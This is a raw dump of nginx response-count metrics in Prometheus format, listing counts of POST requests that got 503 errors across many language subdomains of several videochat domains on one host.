nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bs.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bs.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bs.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bs.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="bs.videochat.world"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ca.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ca.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ca.videochat.world"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ceb.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ceb.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ceb.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ceb.videochat.show"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ceb.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ceb.videochat.world"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="chm.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="chm.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="chm.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="chm.videochat.world"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="cs.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="cs.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="cs.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="cs.videochat.show"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="cs.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="cs.videochat.world"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="cy.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="cy.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="cy.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="cy.videochat.tv.br"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="cy.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="da.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="da.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="da.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="da.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="de.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="de.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="de.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="de.videochat.show"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="de.videochat.tv.br"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="de.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ee.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ee.videochat.date"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ee.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ee.videochat.tv.br"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ee.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="el.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="el.videochat.tv.br"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="el.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="en.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="en.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="eo.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="eo.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="eo.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="eo.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="eo.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="es.videochat.cafe"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="es.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="es.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="es.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="es.videochat.world"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="et.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="et.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="et.videochat.show"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="et.videochat.tv.br"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="et.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="eu.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="eu.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="eu.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="eu.videochat.show"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="eu.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="eu.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fa.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fa.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fa.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fa.videochat.world"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fi.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fi.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fi.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fi.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fi.videochat.world"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fr.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fr.videochat.show"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fr.videochat.tv.br"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="fr.videochat.world"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ga.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ga.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ga.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="gl.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="gl.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="gl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="gl.videochat.tv.br"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="gl.videochat.world"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="gu.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="gu.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="gu.videochat.world"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="he.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="he.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="he.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hi.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hi.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hi.videochat.show"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hi.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hi.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hr.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hr.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hr.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hr.videochat.show"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hr.videochat.tv.br"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hr.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ht.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ht.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ht.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ht.videochat.tv.br"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ht.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hu.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hu.videochat.date"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hu.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hu.videochat.tv.br"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="hu.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="id.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="id.videochat.show"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="id.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="is.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="is.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="is.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="is.videochat.show"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="is.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="is.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="it.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="it.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="it.videochat.show"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="it.videochat.tv.br"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="it.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="jp.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="jp.videochat.date"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="jp.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="jp.videochat.tv.br"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="jp.videochat.world"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="jv.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="jv.videochat.show"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ka.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="kk.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="kk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="kk.videochat.tv.br"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="kk.videochat.world"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="km.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="km.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="km.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="km.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="km.videochat.world"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="kn.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="kn.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="kn.videochat.world"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ko.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ko.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ko.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ko.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ko.videochat.tv.br"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ko.videochat.world"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="kxylkid.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ky.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ky.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ky.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ky.videochat.world"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lb.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lb.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lb.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lb.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lo.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lo.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lo.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lo.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lo.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lt.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lt.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lt.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lt.videochat.world"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lv.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lv.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lv.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lv.videochat.show"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lv.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="lv.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mg.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mg.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mg.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mg.videochat.world"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mi.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mi.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mi.videochat.tv.br"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mi.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mk.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mk.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mk.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mk.videochat.world"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ml.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ml.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ml.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ml.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mn.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mn.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mr.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mr.videochat.show"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mr.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mr.videochat.world"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mrj.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mrj.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mrj.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ms.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ms.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ms.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ms.videochat.world"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mt.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mt.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mt.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mt.videochat.tv.br"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="mt.videochat.world"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="my.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="my.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="my.videochat.world"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ne.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ne.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ne.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ne.videochat.show"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ne.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ne.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="nl.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="nl.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="nl.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="nl.videochat.world"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="no.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="no.videochat.date"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="no.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="no.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="no.videochat.tv.br"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="no.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pa.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pa.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pa.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pa.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pap.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pap.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pap.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pap.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pl.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pl.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pl.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pl.videochat.show"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pl.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pt.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pt.videochat.date"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="pt.videochat.world"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="rbohjhr.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ro.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ro.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ro.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="ro.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sco.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sco.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sco.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sco.videochat.tv.br"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sco.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="si.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="si.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sk.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sk.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sk.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sk.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sl.videochat.cafe"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sl.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sl.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sl.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sl.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sr.videochat.date"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sr.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sv.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sv.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sv.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="503",vhost="sw.videochat.cafe"} 6 